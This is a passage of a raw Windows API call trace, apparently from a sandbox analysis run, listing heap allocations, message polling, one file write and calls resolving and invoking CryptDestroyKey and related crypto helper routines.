dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8f370 | out: hHeap=0x970000) returned 1 [0219.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0219.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0219.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0219.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0219.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0219.976] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0219.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0219.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0219.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0219.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0219.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0219.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ead400 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0219.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0219.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f33860 | out: hHeap=0x970000) returned 1 [0219.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0219.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0219.982] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf040) returned 0x2f24820 [0219.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebc448 | out: hHeap=0x970000) returned 1 [0219.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0219.985] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0219.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0219.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0219.985] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0219.985] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0219.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0219.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0219.986] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f33868*, nNumberOfBytesToWrite=0xf040, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f33868*, lpNumberOfBytesWritten=0x8cf5e4*=0xf040, lpOverlapped=0x0) returned 1 [0219.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0219.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0219.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0219.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0219.990] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0219.990] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0219.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0219.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0219.991] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0219.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0219.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0219.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0219.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0219.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0219.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.992] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0219.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0219.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0219.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0219.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0219.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0219.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0219.993] CryptDestroyKey (hKey=0xa87290) returned 1 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0219.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0219.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0219.994] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0219.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0219.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0219.995] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0219.995] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0219.995] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0219.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0219.995] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0219.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0219.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0219.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0219.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0219.997] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0219.997] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0219.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0219.997] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: 